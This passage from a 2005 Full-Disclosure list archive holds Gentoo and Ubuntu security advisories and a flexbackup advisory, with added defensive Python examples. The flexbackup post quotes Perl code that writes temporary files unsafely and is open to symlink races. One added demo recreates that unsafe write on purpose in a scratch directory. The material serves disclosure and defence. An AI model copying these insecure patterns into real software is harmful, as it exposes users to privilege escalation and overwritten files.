[Full-disclosure] [ GLSA 200510-14 ] Perl, Qt-UnixODBC, CMake: RUNPATH issues

2005-10-17 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200510-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: Perl, Qt-UnixODBC, CMake: RUNPATH issues
      Date: October 17, 2005
      Bugs: #105719, #105721, #106678
        ID: 200510-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple packages suffer from RUNPATH issues that may allow users in
the portage group to escalate privileges.

Background
==========

Perl is a stable, cross-platform programming language created by Larry
Wall. Qt-UnixODBC is an ODBC library for Qt. CMake is a cross-platform
build environment.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  dev-lang/perl           < 5.8.7-r1                      >= 5.8.7-r1
                                                             *>= 5.8.6-r6
  2  dev-db/qt-unixodbc      < 3.3.4-r1                      >= 3.3.4-r1
  3  dev-util/cmake          < 2.2.0-r1                      >= 2.2.0-r1
                                                             *>= 2.0.6-r1
    -------------------------------------------------------------------
     3 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Some packages may introduce insecure paths into the list of directories
that are searched for libraries at runtime. Furthermore, packages
depending on the MakeMaker Perl module for build configuration may have
incorrectly copied the LD_RUN_PATH into the DT_RPATH.

Impact
======

A local attacker, who is a member of the portage group, could create
a malicious shared object in the Portage temporary build directory that
would be loaded at runtime by a dependent executable, potentially
resulting in privilege escalation.

Workaround
==========

Only grant portage group rights to trusted users.

Resolution
==========

All Perl users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose dev-lang/perl

All Qt-UnixODBC users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-db/qt-unixodbc-3.3.4-r1

All CMake users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose dev-util/cmake

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
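As an added illustration of the RUNPATH problem described in GLSA 200510-14 (this is example code written for this page, not part of the advisory or of any Gentoo tooling), the Python script below parses the text output of `readelf -d` from GNU binutils and flags DT_RPATH/DT_RUNPATH entries that a user other than root could populate: empty or relative entries, and absolute entries under trees such as /var/tmp (where Portage builds packages) or /tmp. The sample readelf output, the UNTRUSTED_PREFIXES list and all function names are constructed for the example.

```python
"""Audit ELF search paths (DT_RPATH / DT_RUNPATH) for entries that someone
other than root could populate. Added example for GLSA 200510-14; it parses
the text output of readelf -d (GNU binutils) rather than the ELF file itself."""
import re
import shutil
import subprocess

# Constructed sample of `readelf -d` output; the Portage work directory is the
# kind of leftover path the advisory is about.
SAMPLE_READELF = """\
Dynamic section at offset 0x1ec0 contains 27 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libperl.so]
 0x000000000000000f (RPATH)              Library rpath: [/var/tmp/portage/dev-lang/perl-5.8.7-r1/work/perl-5.8.7:/usr/lib]
 0x000000000000001d (RUNPATH)            Library runpath: [$ORIGIN/../lib:/tmp/build:lib]
 0x000000000000000c (INIT)               0x1000
"""

# Assumption for this example: directories under which an unprivileged or
# portage-group user may create files. Extend to match local policy.
UNTRUSTED_PREFIXES = ("/var/tmp/", "/tmp/", "/dev/shm/", "/home/")

_RPATH_LINE = re.compile(r"\((RPATH|RUNPATH)\)\s+Library r(?:un)?path: \[(.*)\]")


def parse_readelf_dynamic(text):
    """Return (tag, entry) pairs for every colon-separated RPATH/RUNPATH entry."""
    found = []
    for line in text.splitlines():
        match = _RPATH_LINE.search(line)
        if match:
            tag, value = match.groups()
            found.extend((tag, entry) for entry in value.split(":"))
    return found


def classify_entry(entry):
    """Return None when the entry looks safe, else the reason it is not."""
    if entry == "":
        return "empty entry: the loader searches the current working directory"
    if entry.startswith("$ORIGIN"):
        return None  # relative to the binary's own directory; usually intended
    if not entry.startswith("/"):
        return "relative entry: resolved against the current working directory"
    for prefix in UNTRUSTED_PREFIXES:
        if (entry + "/").startswith(prefix):
            return f"inside user-writable tree {prefix.rstrip('/')}"
    return None


def audit_readelf_output(text):
    """Map each flagged search-path entry to the reason it was flagged."""
    flagged = {}
    for _tag, entry in parse_readelf_dynamic(text):
        reason = classify_entry(entry)
        if reason is not None:
            flagged[entry] = reason
    return flagged


def audit_binary(path):
    """Run readelf -d on a real file (needs GNU binutils) and audit the output."""
    readelf = shutil.which("readelf")
    if readelf is None:
        raise RuntimeError("readelf not found; install binutils")
    proc = subprocess.run([readelf, "-d", path], capture_output=True, text=True, check=True)
    return audit_readelf_output(proc.stdout)


if __name__ == "__main__":
    for entry, reason in audit_readelf_output(SAMPLE_READELF).items():
        print(f"INSECURE {entry!r}: {reason}")
```

Running audit_binary() over the files a package installs (on Gentoo, the paths listed in /var/db/pkg/*/*/CONTENTS) finds binaries whose search path still names the build directory; such a hit is exactly the condition the advisory describes, since a portage-group user can recreate that directory and place a library there. Entries starting with $ORIGIN are left unflagged because they are relative to the binary itself, though they deserve the same scrutiny in set-uid programs.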

[Full-disclosure] flexbackup default config insecure temporary file creation

2005-10-17 Thread ZATAZ Audits

#

flexbackup default config insecure temporary file creation

Vendor: http://flexbackup.sourceforge.net/
Advisory: http://www.zataz.net/adviso/flexbackup-09192005.txt
Vendor informed: yes
Exploit available: yes
Impact : low
Exploitation : low

#

The vulnerabilities are due to insecure temporary file creation caused
by the default config.


They are symlink attacks that allow the creation of arbitrary files with
the privileges of the user running the affected script, sensitive
information disclosure, and possibly local or remote arbitrary command
execution.


##
Versions:
##

flexbackup <= 1.2.1

##
Solution:
##

Change default config $tmpdir

#
Timeline:
#

Discovered : 2005-09-06
Vendor notified : 2005-09-19
Vendor response : none
Vendor fix : none
Vendor Sec report ([EMAIL PROTECTED]) : 2005-09-30
Disclosure : 2005-10-15

#
Technical details :
#

Vulnerable code :
-

* In /etc/flexbackup.conf :

$tmpdir = '/tmp';

* Into flexbackup :

checkvar(\$cfg::tmpdir,'tmpdir','exist','/tmp');

If tmpdir is not defined, /tmp is used by default, but here in the conf
file tmpdir is set to /tmp by default.


5229 my $tmp_script = "$cfg::tmpdir/buftest.$host.$PROCESS_ID.sh";

5236 # Create a script which tests the buffer program
5237 open(SCR, ">$tmp_script") || die;
5238 print SCR "#!/bin/sh\n";
5239 print SCR "tmp_data=/tmp/bufftest\$\$.txt\n";
5240 print SCR "tmp_err=/tmp/bufftest\$\$.err\n";
5241 print SCR "echo testme > \$tmp_data\n";
5242 print SCR "$buffer_cmd > /dev/null 2> \$tmp_err < \$tmp_data\n";
5243 print SCR "res=\$?\n";
5244 print SCR "out=\`cat \$tmp_err\`\n";
5245 print SCR "if [ \$res -eq 0 ]; then\n";
5246 print SCR "    echo successful\n";
5247 print SCR "else\n";
5248 print SCR "    echo \"unsuccessful: exit code \$res: \$out\" \n";
5249 print SCR "fi\n";
5250 print SCR "rm -f \$tmp_data \$tmp_err\n";
5251 close(SCR);

Here we have a possible symlink attack (race condition), and also the
possibility of placing an untrusted script into tmp_script (race
condition).


The script that is created is also vulnerable to a possible symlink
attack (race condition).


5253 if ($host eq 'localhost') {
5254     print $::msg "| Checking '$cfg::buffer' on this machine... ";
5255     $pipecmd = "sh $tmp_script ";
5256 } else {
5257     print $::msg "| Checking '$cfg::buffer' on host $host... ";
5258     $pipecmd = "cat $tmp_script | ($::remoteshell $host 'cat > $tmp_script; sh $tmp_script; rm -f $tmp_script')";

We see here that the untrusted script could be executed on localhost or
on a remote host.

5446 my $tmp1 = "$cfg::tmpdir/test1.$PROCESS_ID";
5447 my $tmp2 = "$cfg::tmpdir/test2.$PROCESS_ID";
5448 my $tmp3 = "$cfg::tmpdir/test3.$PROCESS_ID";

Here $cfg::pad_blocks has to be false to exploit the possible symlink
attack (race condition). By default in the conf file pad_blocks is true.
No risk if the configuration is not modified.


359 if (defined($::pkgdelta)) {
360 if (defined($::local)) {
361 list_packages('localhost');
362 find_packaged_files('localhost');
363 find_changed_files('localhost');
364 }
365 foreach my $host (keys %::remotehosts) {
366 list_packages($host);
367 find_packaged_files($host);
368 find_changed_files($host);
369 }
370 $::pkgdelta_filelist = "$cfg::tmpdir/pkgdelta.$PROCESS_ID";
371 line();
372 }

Here we have a possible symlink attack (race condition).

619 my $exitscript = "$cfg::tmpdir/collectexit.$PROCESS_ID.sh";
620 my $result = "$cfg::tmpdir/exitstatus.$PROCESS_ID";

841 unlink($result);
842 open(SCR, ">$exitscript") || die;
843 print SCR '#!/bin/sh' . "\n";
844 print SCR '$@' . "\n";
845 print SCR '[ $? = 0 ] || echo $@ >> ' . $result . "\n";
846 close(SCR);
847 chmod(0755, $exitscript);
848
849 push(@cmds, "[ ! -e $result ]");
850 }

This one is more difficult to race.


#
Related :
#

Bug report : http://bugs.gentoo.org/show_bug.cgi?id=105000
CVE : CAN-2005-2965

#
Credits :
#

Eric Romang ([EMAIL PROTECTED] - ZATAZ Audit) - Gentoo Security Scout
Thanks to the Gentoo Security Team.


[Full-disclosure] [USN-206-1] Lynx vulnerability

2005-10-17 Thread Martin Pitt
===
Ubuntu Security Notice USN-206-1   October 17, 2005
lynx vulnerability
CAN-2005-3120
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

lynx

The problem can be corrected by upgrading the affected package to
version 2.8.5-1ubuntu1.1 (for Ubuntu 4.10), 2.8.5-2ubuntu0.5.04 (for
Ubuntu 5.04), or 2.8.5-2ubuntu0.5.10 (for Ubuntu 5.10).  In general, a
standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Ulf Harnhammar discovered a remote vulnerability in Lynx when
connecting to a news server (NNTP). The function that added missing
escape characters to article headers did not check the size of the
target buffer. Specially crafted news entries could trigger a buffer
overflow, which could be exploited to execute arbitrary code with the
privileges of the user running lynx. In order to exploit this, the
user is not even required to actively visit a news site with Lynx
since a malicious HTML page could automatically redirect to an nntp://
URL with malicious news items.


Updated packages for Ubuntu 4.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.diff.gz
  Size/MD5:17668 c5251ad9cead60e416cf21a461371877
http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.dsc
  Size/MD5:  620 4b4310912f7f76fe01cf8312707be244
http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
  Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_amd64.deb
  Size/MD5:  1882872 8be361fa3eead1e76cbbf2426c255c8b

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_i386.deb
  Size/MD5:  1833368 d481856973186dd5d432e1102c49a917

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_powerpc.deb
  Size/MD5:  1878484 1496a6331a4666295bd89703e509037a

Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.diff.gz
  Size/MD5:18015 6171994c6c8f67d84267aa69d00ba292

http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.dsc
  Size/MD5:  626 08ff9f5a955222f051e4e78101ef7c40
http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
  Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_amd64.deb
  Size/MD5:  1881886 74bc70c3731c903e69fd74eb0a6d2d68

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_i386.deb
  Size/MD5:  1832038 f2e333289856566f93f19ca8fd0c5dfd

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_powerpc.deb
  Size/MD5:  1878380 6440d4eae5fadef31aaf21c5396ef401

Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.diff.gz
  Size/MD5:18015 0f7b6e508094dabd59bee9018b368523

http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.dsc
  Size/MD5:  626 2a90195b05000a7f318eb04386d1ad1c
http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
  Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_amd64.deb
  Size/MD5:  1901120 c2e0da03f20b892aaea81d0f0588f7b1

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_i386.deb
  Size/MD5:  1833214 7c021c0b0667d3aedc8479579d52e5ad

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_powerpc.deb
  Size/MD5:  1881080 5ef72d193817f616e99f01113f6053dd



[Full-disclosure] [USN-207-1] PHP vulnerability

2005-10-17 Thread Martin Pitt
===
Ubuntu Security Notice USN-207-1   October 17, 2005
php4 vulnerability
CAN-2005-3054
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

libapache-mod-php4
libapache2-mod-php4

The problem can be corrected by upgrading the affected package to
version 4:4.3.8-3ubuntu7.13 (for Ubuntu 4.10), or
4:4.3.10-10ubuntu4.2 (for Ubuntu 5.04). In general, a standard system
upgrade is sufficient to effect the necessary changes.

Details follow:

A bug has been found in the handling of the open_basedir directive.
Contrary to the specification, the value of open_basedir
was handled as a prefix instead of a proper directory name even if it
was terminated by a slash ('/'). For example, this allowed PHP scripts
to access the directory /home/user10 when open_basedir was configured
to '/home/user1/'.


Updated packages for Ubuntu 4.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8-3ubuntu7.13.diff.gz
  Size/MD5:   620743 3b06c0da0313bc59be31ac77ead260bc

http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8-3ubuntu7.13.dsc
  Size/MD5: 1626 031af3bb3149f3f4e651a1582d9aee09
http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8.orig.tar.gz
  Size/MD5:  4832570 dd69f8c89281f088eadf4ade3dbd39ee

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.8-3ubuntu7.13_all.deb
  Size/MD5:   332792 ef203ed6e04985389038a2668e2b2bae

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-pear_4.3.8-3ubuntu7.13_all.deb
  Size/MD5:   334636 40cb1635e3ed9860d210cb5054e76332

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:  1689722 cdeaf5cd97840a91b346ff121e00e291

http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:  3198778 8cad2a9376b8483ab6873255274a258f

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-curl_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:17270 321f4676bd3c2bc286e1a726a93ab4c9

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-domxml_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:40434 e058a0198eafea4d8a322f84aa33bb6e

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-gd_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:33612 ad726de3dfdbcacdcde3d90cdf851770

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-ldap_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:21236 2f0ab9a2891bbaf322c67e88b65f4c7a

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mcal_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:18406 f37ed15fb35f433726922d67d0463438

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mhash_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5: 7992 8b013d8ee95fb7563aaef62e9c05251e

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mysql_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:23108 7b3c7f8e89c97557498189719ef30ec0

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-odbc_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:28326 ad745d29d153db18995099efafdd3128

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-recode_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5: 7618 aa19f54e0d7294cbf5cb1f8f976963f0

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-snmp_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:12970 3e592760088678bb91e3767762bc43f5

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-sybase_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:21512 a3190823cdb28c7d27da7a5f1f260569

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-xslt_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:17252 219742cd538690f92d24a82c074fba28

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:  1705532 9f6543c2bad3f2a1eae0175ed4938c91

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.8-3ubuntu7.13_i386.deb
  Size/MD5:  1631536 b533fecf692aa471bbdc7c2125ed1e3f

http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.8-3ubuntu7.13_i386.deb
  Size/MD5:  3044892 60f5e35863ed1210762dd10cc245a8ff

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-curl_4.3.8-3ubuntu7.13_i386.deb
  Size/MD5:16852 fc06a8fc17ff7d820874ea9be1bcc93c

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-domxml_4.3.8-3ubuntu7.13_i386.deb
  Size/MD5:35556 c3b525c920b3d45c332e4ae90e5ba3d3
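The prefix-versus-directory mistake that USN-207-1 describes is easy to reproduce in any language. The Python below is an added example written for this page, not PHP's or Ubuntu's code: allowed_by_prefix() mirrors the behaviour the notice describes (after normalisation only a textual prefix comparison is left, so /home/user10 passes when open_basedir is /home/user1/), and allowed_by_directory() shows the check that was intended, resolving both paths and requiring the base directory to be a complete leading component sequence of the target. Function names and the sample paths are constructed for the example.

```python
"""open_basedir-style containment checks: string prefix (wrong) versus
directory containment (right). Added example, not PHP's implementation."""
import os


def allowed_by_prefix(base, target):
    """The flawed check described in USN-207-1: normalisation drops the
    trailing slash of base, and a plain prefix comparison remains, so
    '/home/user1/' also admits '/home/user10/...'."""
    base_norm = os.path.normpath(base)
    return os.path.normpath(target).startswith(base_norm)


def allowed_by_directory(base, target):
    """Correct check: resolve symlinks and '..' in both paths, then require
    that base is a whole leading component sequence of target."""
    base_real = os.path.realpath(base)
    target_real = os.path.realpath(target)
    try:
        return os.path.commonpath([base_real, target_real]) == base_real
    except ValueError:  # e.g. paths on different drives on Windows
        return False


def compare(base, targets):
    """Return {target: (prefix_check_result, directory_check_result)}."""
    return {t: (allowed_by_prefix(base, t), allowed_by_directory(base, t))
            for t in targets}


# Constructed sample: the exact case from the notice, plus a '..' traversal
# that normalisation also turns into a user10 path.
SAMPLE_TARGETS = (
    "/home/user1/public_html/index.php",
    "/home/user10/.htpasswd",
    "/home/user1/../user10/.htpasswd",
)

if __name__ == "__main__":
    for target, (by_prefix, by_dir) in compare("/home/user1/", SAMPLE_TARGETS).items():
        print(f"{target:40} prefix={by_prefix!s:5} directory={by_dir}")
```

The same containment test applies wherever a configured directory bounds file access (an include path, an upload root, a chroot-like restriction): compare resolved paths component-wise, never as strings.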


[Full-disclosure] [USN-208-1] graphviz vulnerability

2005-10-17 Thread Martin Pitt
===
Ubuntu Security Notice USN-208-1   October 17, 2005
graphviz vulnerability
CAN-2005-2965
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

graphviz

The problem can be corrected by upgrading the affected package to
version 2.2-1ubuntu0.1.  In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Javier Fernández-Sanguino Peña discovered that the dotty tool
created and used temporary files in an insecure way. A local attacker
could exploit this with a symlink attack to create or overwrite
arbitrary files with the privileges of the user running dotty.


  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1.diff.gz
  Size/MD5:   207632 5e836a324f059215f8d0daaa9d469107

http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1.dsc
  Size/MD5:  788 7c934df6c6a84e937a7060d9743d1c29

http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2.orig.tar.gz
  Size/MD5:  4379295 9275d30695a5c22f360acbef7b85acd3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_amd64.deb
  Size/MD5:   147494 2b23526fde607848990ee8b931ea9e0e

http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_amd64.deb
  Size/MD5:  1079078 846c09a610e9c7533c34be24ffd35524

http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_amd64.deb
  Size/MD5:  1026506 9f08f1dba4f6e94320600d5c4d043d83

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_i386.deb
  Size/MD5:   147500 beb9f9a7863864a0da2c829eb4688793

http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_i386.deb
  Size/MD5:  1079084 58c7bd99908e4d61e946dd82b7000f12

http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_i386.deb
  Size/MD5:   947778 7e0fe2c149954e64cc6fdceaa5ae5bec

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_powerpc.deb
  Size/MD5:   147508 2c786f652e59e9379e120d7065b5bca5

http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_powerpc.deb
  Size/MD5:  1079120 e20fb8adb1c98c784dd5016fda1df8d3

http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_powerpc.deb
  Size/MD5:  1075524 2d189fbb333fe89d00dd48a16dc27fc1


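Both the flexbackup post above and USN-208-1 describe the same defect: a program builds a predictable file name in a shared directory (/tmp plus a PID) and opens it for writing, so a symlink planted at that name beforehand redirects the write to whatever the link points at. The Python below is an added example written for this page (it is not flexbackup, dotty or Ubuntu code) that reproduces the unsafe pattern inside a scratch directory and contrasts it with two defences: creating the file with O_CREAT|O_EXCL|O_NOFOLLOW, and using a private mode-0700 temporary directory, which is what the advisory's advice to change $tmpdir away from /tmp amounts to when done properly. Names such as predictable_name(), demo() and safe_roundtrip() are invented for the example.

```python
"""Predictable temporary file names in a shared directory (the pattern in the
flexbackup post and in USN-208-1) versus race-safe creation. Added example;
everything runs inside scratch directories created by the script itself."""
import errno
import os
import shutil
import tempfile


def predictable_name(tmpdir, host, pid):
    """Same naming scheme as the advisory: <tmpdir>/buftest.<host>.<pid>.sh."""
    return os.path.join(tmpdir, f"buftest.{host}.{pid}.sh")


def write_script_unsafely(path, body):
    """The vulnerable pattern, equivalent to Perl's open(SCR, ">$tmp_script"):
    a plain truncating open follows a symlink and clobbers its target."""
    with open(path, "w") as fh:
        fh.write(body)


def write_script_safely(path, body):
    """Create only if nothing exists at the path and it is not a symlink
    (O_EXCL, O_NOFOLLOW), with owner-only permissions from the first instant."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(body)


def private_tmpdir():
    """The fix the advisory recommends (a $tmpdir other than shared /tmp), done
    properly: a fresh mode-0700 directory nobody else can pre-populate."""
    return tempfile.mkdtemp(prefix="flexbackup.")


def demo():
    """Simulate a symlink planted at the predictable name before the script
    runs. Returns (victim_clobbered_by_unsafe_write, safe_write_refused)."""
    scratch = tempfile.mkdtemp(prefix="symlink-demo.")
    try:
        victim = os.path.join(scratch, "victim.txt")
        with open(victim, "w") as fh:
            fh.write("original\n")
        planted = predictable_name(scratch, "localhost", 4242)
        os.symlink(victim, planted)  # the link that sits where the script will write

        write_script_unsafely(planted, "#!/bin/sh\necho clobbered\n")
        with open(victim) as fh:
            clobbered = fh.read() != "original\n"

        try:
            write_script_safely(planted, "#!/bin/sh\necho safe\n")
            refused = False
        except OSError as exc:
            refused = exc.errno in (errno.EEXIST, errno.ELOOP)
        return clobbered, refused
    finally:
        shutil.rmtree(scratch)


def safe_roundtrip():
    """The defended flow end to end: private directory plus exclusive create."""
    tmpdir = private_tmpdir()
    try:
        path = predictable_name(tmpdir, "localhost", os.getpid())
        write_script_safely(path, "#!/bin/sh\necho ok\n")
        with open(path) as fh:
            return fh.read()
    finally:
        shutil.rmtree(tmpdir)


if __name__ == "__main__":
    print("unsafe write clobbered victim, safe write refused:", demo())
    print("safe round trip wrote:", safe_roundtrip().strip())
```

In Perl the equivalent of write_script_safely() is File::Temp (tempfile/tempdir), which also picks an unpredictable name; note that the flexbackup buffer-test script additionally hard-codes /tmp/bufftest$$ inside the generated shell script, so the generated script needs the same treatment, not just the Perl code that writes it.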

[Full-disclosure] [ GLSA 200510-16 ] phpMyAdmin: Local file inclusion vulnerability

2005-10-17 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200510-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: phpMyAdmin: Local file inclusion vulnerability
      Date: October 17, 2005
      Bugs: #108939
        ID: 200510-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

phpMyAdmin contains a local file inclusion vulnerability that may lead
to the execution of arbitrary code.

Background
==========

phpMyAdmin is a tool written in PHP intended to handle the
administration of MySQL over the web.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  dev-db/phpmyadmin         < 2.6.4_p2                    >= 2.6.4_p2

Description
===========

Maksymilian Arciemowicz reported that in
libraries/grab_globals.lib.php, the $__redirect parameter was not
correctly validated. Systems running PHP in safe mode are not affected.

Impact
======

A local attacker may exploit this vulnerability by sending malicious
requests, causing the execution of arbitrary code with the rights of
the user running the web server.

Workaround
==========

Run PHP in safe mode.

Resolution
==========

All phpMyAdmin users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-db/phpmyadmin-2.6.4_p2

References
==========

  [ 1 ] PMASA-2005-4
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-4

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-16.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

